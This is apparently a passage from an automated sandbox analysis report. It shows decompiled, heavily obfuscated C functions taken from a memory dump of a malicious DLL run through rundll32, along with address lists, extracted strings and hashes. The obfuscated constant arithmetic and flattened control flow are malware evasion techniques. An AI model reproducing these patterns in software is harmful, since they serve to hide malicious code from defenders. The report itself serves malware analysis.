				_v1084 = 0xa8f5;
				_t408 = 0x17;
				_v1084 = _v1084 / _t408;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x001d0b4a;
				_v1112 = 0x1fad;
				_v1112 = _v1112 + 0x32f;
				_v1112 = _v1112 | 0xebab1cec;
				_v1112 = _v1112 ^ 0xebab1aef;
				_v1160 = 0x54dd;
				_t409 = 0x5b;
				_v1160 = _v1160 / _t409;
				_v1160 = _v1160 + 0xffff837a;
				_v1160 = _v1160 >> 0xd;
				_v1160 = _v1160 ^ 0x00079eb6;
				_v1064 = 0x3be9;
				_v1064 = _v1064 + 0xc5e5;
				_v1064 = _v1064 ^ 0x0001038f;
				_v1152 = 0xf3a;
				_v1152 = _v1152 >> 2;
				_v1152 = _v1152 | 0xf0e2a687;
				_v1152 = _v1152 ^ 0xf0e2f519;
				_v1104 = 0x6a02;
				_v1104 = _v1104 ^ 0xd79757ec;
				_v1104 = _v1104 ^ 0x72111d97;
				_v1104 = _v1104 ^ 0xa58624a2;
				_v1180 = 0x1edb;
				_v1180 = _v1180 << 8;
				_v1180 = _v1180 | 0xc66b0f2d;
				_t410 = 0x2a;
				_v1180 = _v1180 * 0x59;
				_v1180 = _v1180 ^ 0x02748563;
				_v1184 = 0xc21d;
				_v1184 = _v1184 + 0xffff4953;
				_v1184 = _v1184 + 0x9d58;
				_v1184 = _v1184 + 0xffffc405;
				_v1184 = _v1184 ^ 0x000079fa;
				_v1068 = 0xa3cf;
				_v1068 = _v1068 << 0xd;
				_v1068 = _v1068 ^ 0x1479d59b;
				_v1096 = 0x8d67;
				_v1096 = _v1096 / _t410;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 ^ 0x00006505;
				_v1076 = 0xcc46;
				_t411 = 0x5a;
				_v1076 = _v1076 * 0x1b;
				_v1076 = _v1076 ^ 0x0015fa07;
				_v1172 = 0x912b;
				_v1172 = _v1172 ^ 0x3d1f1ee2;
				_v1172 = _v1172 + 0x5bc5;
				_v1172 = _v1172 + 0xeec;
				_v1172 = _v1172 ^ 0x3d1fd618;
				_v1088 = 0xd14f;
				_v1088 = _v1088 / _t411;
				_v1088 = _v1088 << 2;
				_v1088 = _v1088 ^ 0x00001f20;
				_v1060 = 0x3e83;
				_v1060 = _v1060 ^ 0xd304f88f;
				_v1060 = _v1060 ^ 0xd304fa7e;
				_v1168 = 0xb05c;
				_v1168 = _v1168 << 8;
				_t412 = 0x34;
				_v1168 = _v1168 / _t412;
				_v1168 = _v1168 ^ 0xc0861c97;
				_v1168 = _v1168 ^ 0xc0851309;
				_v1108 = 0xe1c2;
				_v1108 = _v1108 ^ 0xa90fabc2;
				_v1108 = _v1108 | 0xcfc04e49;
				_v1108 = _v1108 ^ 0xefcf6bdd;
				_v1140 = 0x68db;
				_t413 = 0x4f;
				_v1140 = _v1140 / _t413;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 ^ 0x00007a7a;
				_v1176 = 0x96b;
				_v1176 = _v1176 | 0xfb94fdcf;
				_v1176 = _v1176 << 2;
				_v1176 = _v1176 ^ 0xee53e864;
				_v1124 = 0x2254;
				_v1124 = _v1124 ^ 0xa48881a1;
				_v1124 = _v1124 << 0xb;
				_v1124 = _v1124 ^ 0x451fa827;
				_v1100 = 0x5734;
				_v1100 = _v1100 ^ 0x74517f62;
				_t414 = 7;
				_v1100 = _v1100 * 0x13;
				_v1100 = _v1100 ^ 0xa205a981;
				_v1132 = 0x66ff;
				_v1132 = _v1132 * 0x1f;
				_v1132 = _v1132 + 0xf308;
				_v1132 = _v1132 ^ 0x000d172f;
				_v1080 = 0x2972;
				_v1080 = _v1080 * 0x38;
				_v1080 = _v1080 ^ 0x000935ad;
				_v1116 = 0x9ff8;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 + 0xfffff067;
				_v1116 = _v1116 ^ 0xffff9674;
				_v1092 = 0x2f3f;
				_v1092 = _v1092 ^ 0x892685f6;
				_v1092 = _v1092 + 0xffff53b4;
				_v1092 = _v1092 ^ 0x8925829b;
				_v1164 = 0xb542;
				_v1164 = _v1164 | 0x5ab5abdf;
				_v1164 = _v1164 + 0xffffa79d;
				_v1164 = _v1164 / _t414;
				_v1164 = _v1164 ^ 0x0cf5716d;
				_v1144 = 0x47b6;
				_v1144 = _v1144 * 0x4c;
				_v1144 = _v1144 | 0xf71f6dca;
				_v1144 = _v1144 ^ 0xf71f15ee;
				_v1072 = 0x81ab;
				_v1072 = _v1072 * 0x49;
				_v1072 = _v1072 ^ 0x00249dbb;
				_v1148 = 0xb5d2;
				_v1148 = _v1148 * 0x6d;
				_t415 = 0x2c;
				_v1148 = _v1148 / _t415;
				_v1148 = _v1148 ^ 0x0001b92b;
				_v1120 = 0xe5fa;
				_v1120 = _v1120 >> 0x10;
				_v1120 = _v1120 >> 9;
				_v1120 = _v1120 ^ 0x00005e7f;
				_v1156 = 0xab36;
				_t416 = 0x43;
				_v1156 = _v1156 / _t416;
				_v1156 = _v1156 >> 5;
				_v1156 = _v1156 << 6;
				_v1156 = _v1156 ^ 0x000049b3;
				_v1128 = 0xa89e;
				_t417 = 0x13;
				_v1128 = _v1128 * 0x34;
				_v1128 = _v1128 / _t417;
				_v1128 = _v1128 ^ 0x0001a301;
				_v1136 = 0xcc9;
				_v1136 = _v1136 + 0xe654;
				_v1136 = _v1136 * 0x71;
				_v1136 = _v1136 ^ 0x006b6140;
				do {
					while(_t366 != 0x68d33d8) {
						if(_t366 == 0xa2fd3bc) {
							_push(0x10001000);
							_push(_v1152);
							E100163BF(E1001BF25(_v1160, _v1064, __eflags), __eflags, _v1180, _v1184,  &_v520,  *0x100221b0 + 0x234, _v1068,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v1096);
							E1001C5F7(_v1076, _v1172, _v1088, _v1060, _t346);
							_t420 =  &(_t420[0xb]);
							_t366 = 0xcdbf6e0;
							continue;
						}
						if(_t366 == 0xcdbf6e0) {
							E10007C9A( &_v1040, _v1168, _t366, _v1108, _v1140);
							E1001BAE0( &_v1040,  &_v1040,  &_v1040);
							E10013D7C( &_v1040, __eflags, _v1116, _v1092,  &_v520);
							_t420 =  &(_t420[9]);
							_t366 = 0x3500b19e;
							continue;
						}
						if(_t366 == 0x24c46d14) {
							_t360 = E10018F65();
							L10:
							_t366 = 0xa2fd3bc;
							continue;
						}
						if(_t366 == 0x304a50c6) {
							_t360 = E1000704B();
							goto L10;
						}
						if(_t366 != 0x3500b19e) {
							goto L17;
						}
						 *((short*)(E10001E13(_v1164, _v1144, _v1072, _v1148,  &_v520))) = 0;
						_t281 =  &_v1156; // 0x6b6140
						return E1001BE71(_v1120,  &_v520,  *_t281, _v1128, _v1136);
					}
					__eflags =  *((intOrPtr*)( *0x100221b0 + 0x22c));
					if(__eflags == 0) {
						_t366 = 0x24c46d14;
						goto L17;
					}
					_t366 = 0x304a50c6;
					continue;
					L17:
					__eflags = _t366 - 0x360d39a3;
				} while (__eflags != 0);
				return _t360;
			}

0x1000421e
0x10004224
0x1000422e
0x10004236
0x1000423b
0x10004246
0x10004251
0x10004263
0x10004268
0x1000426e
0x10004273
0x1000427b
0x10004283
0x1000428b
0x10004293
0x1000429b
0x100042a7
0x100042ac
0x100042b2
0x100042ba
0x100042bf
0x100042c7
0x100042d2
0x100042dd
0x100042e8
0x100042f0
0x100042f5
0x100042fd
0x10004305
0x1000430d
0x10004315
0x1000431d
0x10004325
0x1000432d
0x10004332
0x1000433f
0x10004342
0x10004346
0x1000434e
0x10004356
0x1000435e
0x10004366
0x1000436e
0x10004376
0x10004381
0x10004389
0x10004394
0x100043a4
0x100043a8
0x100043ad
0x100043b5
0x100043c8
0x100043c9
0x100043cd
0x100043d5
0x100043dd
0x100043e5
0x100043ed
0x100043f5
0x100043fd
0x1000440b
0x10004411
0x10004416
0x1000441e
0x10004429
0x10004434
0x1000443f
0x10004447
0x10004452
0x10004457
0x1000445d
0x10004465
0x1000446d
0x10004475
0x1000447d
0x10004485
0x1000448d
0x10004499
0x1000449e
0x100044a4
0x100044a9
0x100044b1
0x100044b9
0x100044c1
0x100044c6
0x100044ce
0x100044d6
0x100044de
0x100044e3
0x100044eb
0x100044f3
0x10004500
0x10004501
0x10004505
0x1000450d
0x1000451a
0x1000451e
0x10004526
0x1000452e
0x1000453b
0x1000453f
0x10004547
0x1000454f
0x10004554
0x1000455c
0x10004564
0x1000456c
0x10004574
0x1000457c
0x10004584
0x1000458c
0x10004594
0x100045a2
0x100045a6
0x100045ae
0x100045bb
0x100045bf
0x100045c7
0x100045cf
0x100045e2
0x100045e9
0x100045f4
0x10004601
0x1000460d
0x10004612
0x10004618
0x10004625
0x10004632
0x1000463c
0x10004641
0x10004649
0x10004655
0x1000465a
0x10004660
0x10004665
0x1000466a
0x10004672
0x1000467f
0x10004680
0x1000468a
0x1000468e
0x10004696
0x1000469e
0x100046ab
0x100046af
0x100046b7
0x100046b7
0x100046c5
0x100047bc
0x100047c1
0x1000480f
0x1000482e
0x10004833
0x10004836
0x00000000
0x10004836
0x100046d1
0x10004765
0x10004784
0x100047aa
0x100047af
0x100047b2
0x00000000
0x100047b2
0x100046d5
0x1000474a
0x1000473f
0x1000473f
0x00000000
0x1000473f
0x100046d9
0x1000473a
0x00000000
0x1000473a
0x100046e1
0x00000000
0x00000000
0x10004718
0x1000471b
0x00000000
0x10004728
0x10004845
0x1000484c
0x10004855
0x00000000
0x10004855
0x1000484e
0x00000000
0x10004857
0x10004857
0x10004857
0x00000000

Strings

@ak, xrefs: 1000471B
dS, xrefs: 100044C6
T", xrefs: 100044CE
;, xrefs: 100042C7
4W, xrefs: 100044EB
?/, xrefs: 10004564
r), xrefs: 1000452E

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4W$?/$@ak$T"$dS$r)$;
API String ID: 0-3846280122
Opcode ID: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
Instruction ID: aaaead02f87506f2cc3ba4b8236e1e241c9b44c198d9f5d598770aa8f5f1306b
Opcode Fuzzy Hash: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
Instruction Fuzzy Hash: FFF131715083809FE368CF25C489A4FBBE2FBC5758F10891DF19A8A260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001EDB9, Relevance: 9.0, Strings: 7, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001EDB9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				void* _t250;
				void* _t253;
				void* _t263;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int* _t298;

				_t298 =  &_v1660;
				_v1584 = 0xa79a;
				_v1584 = _v1584 + 0xffffb587;
				_t263 = 0x29655c79;
				_v1584 = _v1584 ^ 0x00005d08;
				_v1600 = 0x98d7;
				_v1600 = _v1600 << 3;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x00015089;
				_v1576 = 0x4e32;
				_v1576 = _v1576 * 0x22;
				_t289 = 0;
				_v1576 = _v1576 ^ 0x000a4295;
				_v1616 = 0x1d29;
				_v1616 = _v1616 + 0xffff7723;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x01ffbac3;
				_v1632 = 0x8dbf;
				_v1632 = _v1632 >> 0xa;
				_t290 = 0x76;
				_v1632 = _v1632 * 0x3a;
				_v1632 = _v1632 | 0x3b821885;
				_v1632 = _v1632 ^ 0x3b827377;
				_v1640 = 0x104a;
				_v1640 = _v1640 / _t290;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 + 0xffff7725;
				_v1640 = _v1640 ^ 0xffff57b6;
				_v1580 = 0xe6dc;
				_v1580 = _v1580 ^ 0xc8d716f9;
				_v1580 = _v1580 ^ 0xc8d7d197;
				_v1592 = 0xe0fa;
				_t291 = 0x2f;
				_v1592 = _v1592 / _t291;
				_v1592 = _v1592 ^ 0x0000698d;
				_v1564 = 0x5e4f;
				_v1564 = _v1564 + 0xffff7efe;
				_v1564 = _v1564 ^ 0xffffb6a6;
				_v1660 = 0xba44;
				_v1660 = _v1660 * 0x61;
				_v1660 = _v1660 | 0x90c21cb8;
				_v1660 = _v1660 ^ 0xb89d15b1;
				_v1660 = _v1660 ^ 0x285bb090;
				_v1572 = 0x49e8;
				_v1572 = _v1572 | 0x7392aca1;
				_v1572 = _v1572 ^ 0x7392e7ec;
				_v1636 = 0x1558;
				_v1636 = _v1636 + 0xffffdbcc;
				_v1636 = _v1636 + 0xffffaf90;
				_v1636 = _v1636 | 0x27f9081b;
				_v1636 = _v1636 ^ 0xffff923a;
				_v1620 = 0xb008;
				_v1620 = _v1620 ^ 0x6f98128b;
				_v1620 = _v1620 + 0xffff628e;
				_v1620 = _v1620 ^ 0x6f98181c;
				_v1652 = 0x8c98;
				_v1652 = _v1652 + 0xffff2e73;
				_v1652 = _v1652 ^ 0xfa65a217;
				_v1652 = _v1652 ^ 0x9182de5d;
				_v1652 = _v1652 ^ 0x9418af52;
				_v1644 = 0x793;
				_v1644 = _v1644 ^ 0x7d1bb9ea;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 >> 3;
				_v1644 = _v1644 ^ 0x0ddf10b4;
				_v1568 = 0x9636;
				_v1568 = _v1568 << 8;
				_v1568 = _v1568 ^ 0x009600d5;
				_v1648 = 0x45b1;
				_v1648 = _v1648 ^ 0x353fc9cd;
				_v1648 = _v1648 + 0x9448;
				_v1648 = _v1648 + 0xffff2c3a;
				_v1648 = _v1648 ^ 0x353f36fa;
				_v1608 = 0xcb4a;
				_v1608 = _v1608 ^ 0xf323fa50;
				_v1608 = _v1608 + 0xfffff921;
				_v1608 = _v1608 ^ 0xf3231221;
				_v1656 = 0xe414;
				_v1656 = _v1656 << 5;
				_t292 = 0x14;
				_v1656 = _v1656 * 0xb;
				_v1656 = _v1656 / _t292;
				_v1656 = _v1656 ^ 0x000fea65;
				_v1588 = 0xfdd9;
				_v1588 = _v1588 ^ 0x3c6de270;
				_v1588 = _v1588 ^ 0x3c6d203a;
				_v1596 = 0x9110;
				_t293 = 0x5b;
				_v1596 = _v1596 / _t293;
				_v1596 = _v1596 ^ 0xad99dc79;
				_v1596 = _v1596 ^ 0xad99c3bd;
				_v1604 = 0xf5c3;
				_v1604 = _v1604 + 0xffffe486;
				_t294 = 0x52;
				_v1604 = _v1604 / _t294;
				_v1604 = _v1604 ^ 0x00000517;
				_v1612 = 0xce05;
				_v1612 = _v1612 + 0xa493;
				_v1612 = _v1612 | 0x844a9c62;
				_v1612 = _v1612 ^ 0x844bf5c1;
				_v1628 = 0xfbe7;
				_v1628 = _v1628 ^ 0xe81fb84e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xf43ac181;
				_v1624 = 0x777e;
				_t295 = 0x13;
				_v1624 = _v1624 / _t295;
				_v1624 = _v1624 + 0xbc0b;
				_v1624 = _v1624 ^ 0x0000c134;
				do {
					while(_t263 != 0x1a33eb4b) {
						if(_t263 == 0x29655c79) {
							_push(_t263);
							E10001D54(_v1600, _t263, _v1576, _v1616, _v1632,  &_v1040, _v1640, _v1584);
							_t298 =  &(_t298[8]);
							_t263 = 0x3af62d5c;
							continue;
						} else {
							_t302 = _t263 - 0x3af62d5c;
							if(_t263 == 0x3af62d5c) {
								_push(0x10001020);
								_push(_v1564);
								_t253 = E1001BF25(_v1580, _v1592, _t302);
								E100173C0( &_v1560, _t302);
								E10003482(_v1572, _t302,  &_v1040,  &_v520, _v1636, _v1620,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t253, _v1652, _v1644, _v1568);
								E1001C5F7(_v1648, _v1608, _v1656, _v1588, _t253);
								_t298 =  &(_t298[0x11]);
								_t263 = 0x1a33eb4b;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1624);
					_push(0);
					_push( &_v520);
					_push(_t263);
					_push(_v1628);
					_push(_v1612);
					_push(0);
					_push(0);
					_t250 = E100189F6(_v1596, _v1604, __eflags);
					_t298 =  &(_t298[8]);
					__eflags = _t250;
					_t289 =  !=  ? 1 : _t289;
					_t263 = 0x29dc45dd;
					L7:
					__eflags = _t263 - 0x29dc45dd;
				} while (__eflags != 0);
				return _t289;
			}

0x1001edb9
0x1001edbf
0x1001edc9
0x1001edd1
0x1001edd6
0x1001edde
0x1001ede6
0x1001edeb
0x1001edf0
0x1001edf8
0x1001ee0a
0x1001ee0e
0x1001ee10
0x1001ee18
0x1001ee20
0x1001ee28
0x1001ee2d
0x1001ee35
0x1001ee3d
0x1001ee47
0x1001ee4a
0x1001ee4e
0x1001ee56
0x1001ee5e
0x1001ee6e
0x1001ee72
0x1001ee77
0x1001ee7f
0x1001ee87
0x1001ee8f
0x1001ee97
0x1001ee9f
0x1001eeab
0x1001eeae
0x1001eeb2
0x1001eeba
0x1001eec2
0x1001eeca
0x1001eed2
0x1001eedf
0x1001eee3
0x1001eeeb
0x1001eef3
0x1001eefb
0x1001ef03
0x1001ef0b
0x1001ef13
0x1001ef1b
0x1001ef23
0x1001ef2b
0x1001ef33
0x1001ef3b
0x1001ef43
0x1001ef4b
0x1001ef53
0x1001ef5b
0x1001ef63
0x1001ef6b
0x1001ef73
0x1001ef7b
0x1001ef83
0x1001ef8b
0x1001ef93
0x1001ef98
0x1001ef9d
0x1001efa5
0x1001efad
0x1001efb2
0x1001efba
0x1001efc4
0x1001efd1
0x1001efd9
0x1001efe1
0x1001efe9
0x1001eff1
0x1001eff9
0x1001f001
0x1001f009
0x1001f011
0x1001f01d
0x1001f020
0x1001f02c
0x1001f030
0x1001f038
0x1001f040
0x1001f048
0x1001f050
0x1001f05c
0x1001f061
0x1001f067
0x1001f06f
0x1001f077
0x1001f07f
0x1001f08b
0x1001f090
0x1001f096
0x1001f09e
0x1001f0a6
0x1001f0ae
0x1001f0b6
0x1001f0be
0x1001f0c6
0x1001f0ce
0x1001f0d3
0x1001f0db
0x1001f0e7
0x1001f0ea
0x1001f0ee
0x1001f0f6
0x1001f0fe
0x1001f0fe
0x1001f110
0x1001f1bb
0x1001f1dd
0x1001f1e2
0x1001f1e5
0x00000000
0x1001f116
0x1001f116
0x1001f118
0x1001f11e
0x1001f123
0x1001f12f
0x1001f13a
0x1001f18d
0x1001f1a9
0x1001f1ae
0x1001f1b1
0x00000000
0x1001f1b1
0x1001f118
0x00000000
0x1001f110
0x1001f1ec
0x1001f1f7
0x1001f1f9
0x1001f1fa
0x1001f1fb
0x1001f1ff
0x1001f20b
0x1001f20d
0x1001f20f
0x1001f216
0x1001f21a
0x1001f21c
0x1001f21f
0x1001f224
0x1001f224
0x1001f224
0x1001f23b

Strings

O^, xrefs: 1001EEBA
y\e), xrefs: 1001EDD1
~w, xrefs: 1001F0DB
y\e), xrefs: 1001F10A
2N, xrefs: 1001EDF8
: m<, xrefs: 1001F048
I, xrefs: 1001EEFB

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
API String ID: 0-1365918997
Opcode ID: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
Instruction ID: 07705b716052aaf1326add7495473fb9ceb929661d391744f26a35cbcf8e81d5
Opcode Fuzzy Hash: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
Instruction Fuzzy Hash: DBB110B11083819FD3A8CF65C98995BBBE1FBC4748F108A1DF1968A2A0D3B5D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10014693, Relevance: 7.9, Strings: 6, Instructions: 366
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10014693(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t341;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				void* _t414;
				signed int* _t461;
				void* _t462;
				signed int _t463;
				signed int* _t466;
				void* _t469;

				_push(_a8);
				_t461 = _a4;
				_t462 = __ecx;
				_push(_t461);
				_push(__ecx);
				E100056B2(_t341);
				_v56 = _v56 & 0x00000000;
				_t466 =  &(( &_v192)[4]);
				_v60 = 0x669039;
				_v192 = 0x43d8;
				_t414 = 0x3f50d67;
				_v192 = _v192 + 0xbf58;
				_v192 = _v192 << 6;
				_t403 = 0x63;
				_v192 = _v192 / _t403;
				_v192 = _v192 ^ 0x0000f3e0;
				_v124 = 0xc4a4;
				_v124 = _v124 + 0x7400;
				_v124 = _v124 << 8;
				_v124 = _v124 ^ 0x01388cfe;
				_v156 = 0x33d6;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_t404 = 0x3d;
				_v156 = _v156 / _t404;
				_v156 = _v156 ^ 0x000de827;
				_v64 = 0xebcf;
				_v64 = _v64 << 6;
				_v64 = _v64 ^ 0x003ae596;
				_v172 = 0x968a;
				_v172 = _v172 + 0xffffd46d;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0xd191ab81;
				_v172 = _v172 ^ 0xd192e477;
				_v128 = 0xb9a8;
				_v128 = _v128 >> 0x10;
				_t405 = 0x76;
				_v128 = _v128 * 0x5e;
				_v128 = _v128 ^ 0x000020d6;
				_v140 = 0x545;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0xc4bcec74;
				_v140 = _v140 ^ 0xc4be45d2;
				_v176 = 0xd323;
				_v176 = _v176 ^ 0x784c5418;
				_v176 = _v176 << 0xc;
				_v176 = _v176 / _t405;
				_v176 = _v176 ^ 0x01b2deaa;
				_v184 = 0x38a8;
				_v184 = _v184 * 0x62;
				_v184 = _v184 | 0x92387752;
				_v184 = _v184 * 0x36;
				_v184 = _v184 ^ 0xd91272a1;
				_v68 = 0x8687;
				_v68 = _v68 | 0x8796c77c;
				_v68 = _v68 ^ 0x8796e993;
				_v84 = 0x4bf9;
				_v84 = _v84 ^ 0xc2db0559;
				_v84 = _v84 ^ 0xc2db1bd4;
				_v152 = 0xec5b;
				_v152 = _v152 * 0x77;
				_t406 = 0x48;
				_v152 = _v152 / _t406;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0x00037fba;
				_v96 = 0x6f52;
				_v96 = _v96 / _t406;
				_v96 = _v96 ^ 0x00007059;
				_v144 = 0x2d9f;
				_v144 = _v144 + 0x5a02;
				_v144 = _v144 + 0xffff7526;
				_t407 = 0x14;
				_v144 = _v144 * 0x64;
				_v144 = _v144 ^ 0xfffec776;
				_v104 = 0x3779;
				_v104 = _v104 + 0x6440;
				_v104 = _v104 ^ 0x0000977f;
				_v148 = 0x1d77;
				_v148 = _v148 * 0x7c;
				_v148 = _v148 / _t407;
				_v148 = _v148 + 0xffff1bf8;
				_v148 = _v148 ^ 0xffffcd98;
				_v100 = 0xd3a2;
				_v100 = _v100 | 0xe4f90cf7;
				_v100 = _v100 ^ 0xe4f9cd3c;
				_v180 = 0x5cac;
				_v180 = _v180 + 0xffff9624;
				_v180 = _v180 + 0xffff4ad1;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0xfffcf483;
				_v108 = 0x7cb5;
				_t408 = 0x18;
				_v108 = _v108 * 0x12;
				_v108 = _v108 ^ 0x000894d5;
				_v116 = 0x5a78;
				_v116 = _v116 / _t408;
				_v116 = _v116 + 0x27ad;
				_v116 = _v116 ^ 0x00004e34;
				_v76 = 0x7bae;
				_t409 = 0x47;
				_v76 = _v76 / _t409;
				_v76 = _v76 ^ 0x00000ced;
				_v112 = 0x9931;
				_v112 = _v112 + 0x6c1;
				_v112 = _v112 + 0xc184;
				_v112 = _v112 ^ 0x000135f5;
				_v120 = 0x43fe;
				_v120 = _v120 << 0xa;
				_v120 = _v120 | 0xcc2e0fa7;
				_v120 = _v120 ^ 0xcd2fcc20;
				_v160 = 0xf125;
				_v160 = _v160 | 0x7ac202f8;
				_v160 = _v160 << 9;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xff40056a;
				_v168 = 0x6f11;
				_v168 = _v168 * 0x26;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0xffff1ec9;
				_v168 = _v168 ^ 0xffffabe9;
				_v136 = 0x750;
				_v136 = _v136 ^ 0x499ec156;
				_t410 = 0x2c;
				_v136 = _v136 / _t410;
				_v136 = _v136 ^ 0x01ac6e57;
				_v164 = 0xde1f;
				_v164 = _v164 ^ 0x9a2c0c2f;
				_v164 = _v164 ^ 0xfc2f145b;
				_t463 = 0x60;
				_v164 = _v164 / _t463;
				_v164 = _v164 ^ 0x01104128;
				_v92 = 0x3401;
				_v92 = _v92 + 0xfffffc2d;
				_v92 = _v92 ^ 0x00002a73;
				_v188 = 0x45d7;
				_t411 = 0x13;
				_v188 = _v188 * 0x21;
				_v188 = _v188 * 0x1d;
				_v188 = _v188 * 0x48;
				_v188 = _v188 ^ 0x496dbef5;
				_v72 = 0x3e06;
				_v72 = _v72 / _t411;
				_v72 = _v72 ^ 0x000062d8;
				_v80 = 0xd8ef;
				_v80 = _v80 + 0xffffbf53;
				_v80 = _v80 ^ 0x0000c5f4;
				_v88 = 0x5fbd;
				_v88 = _v88 | 0x60cc2402;
				_v88 = _v88 ^ 0x60cc7a75;
				_v132 = 0xf2b5;
				_v132 = _v132 << 8;
				_v132 = _v132 / _t463;
				_v132 = _v132 ^ 0x00028738;
				goto L1;
				do {
					while(1) {
						L1:
						_t469 = _t414 - 0x1739e244;
						if(_t469 > 0) {
							break;
						}
						if(_t469 == 0) {
							E1001F3E9(_v156, _v64, _v172, _t461,  &_v52);
							_t466 =  &(_t466[3]);
							_t414 = 0x28f53702;
							continue;
						} else {
							if(_t414 == 0x9fb2af) {
								E1000CD04(_v108,  *((intOrPtr*)(_t462 + 0x14)), _v116,  &_v52, _v76);
								_t466 =  &(_t466[3]);
								_t414 = 0x25cb38c6;
								continue;
							} else {
								if(_t414 == 0x3f50d67) {
									_t414 = 0xe8afa1d;
									 *_t461 =  *_t461 & 0x00000000;
									_t461[1] = _v132;
									continue;
								} else {
									if(_t414 == 0x65a472b) {
										E1000CD04(_v148,  *((intOrPtr*)(_t462 + 0x10)), _v100,  &_v52, _v180);
										_t466 =  &(_t466[3]);
										_t414 = 0x9fb2af;
										continue;
									} else {
										if(_t414 == 0x966e996) {
											E1000CD04(_v72,  *((intOrPtr*)(_t462 + 0x28)), _v80,  &_v52, _v88);
										} else {
											if(_t414 == 0xe8afa1d) {
												_t461[1] = E10015DAA(_t462);
												_t414 = 0x35acaa76;
												continue;
											} else {
												_t475 = _t414 - 0x16696929;
												if(_t414 != 0x16696929) {
													goto L26;
												} else {
													E10018582(_v136, _t462 + 0x20, _t475, _v164,  &_v52, _v92, _v188);
													_t466 =  &(_t466[4]);
													_t414 = 0x966e996;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t461;
						_t340 =  *_t461 != 0;
						__eflags = _t340;
						return 0 | _t340;
					}
					__eflags = _t414 - 0x1b4d4176;
					if(_t414 == 0x1b4d4176) {
						E1000CD04(_v96,  *((intOrPtr*)(_t462 + 0xc)), _v144,  &_v52, _v104);
						_t466 =  &(_t466[3]);
						_t414 = 0x65a472b;
						goto L26;
					} else {
						__eflags = _t414 - 0x25c5cce0;
						if(_t414 == 0x25c5cce0) {
							E1000CD04(_v68,  *((intOrPtr*)(_t462 + 8)), _v84,  &_v52, _v152);
							_t466 =  &(_t466[3]);
							_t414 = 0x1b4d4176;
							goto L1;
						} else {
							__eflags = _t414 - 0x25cb38c6;
							if(__eflags == 0) {
								E10018582(_v112, _t462 + 0x18, __eflags, _v120,  &_v52, _v160, _v168);
								_t466 =  &(_t466[4]);
								_t414 = 0x16696929;
								goto L1;
							} else {
								__eflags = _t414 - 0x28f53702;
								if(__eflags == 0) {
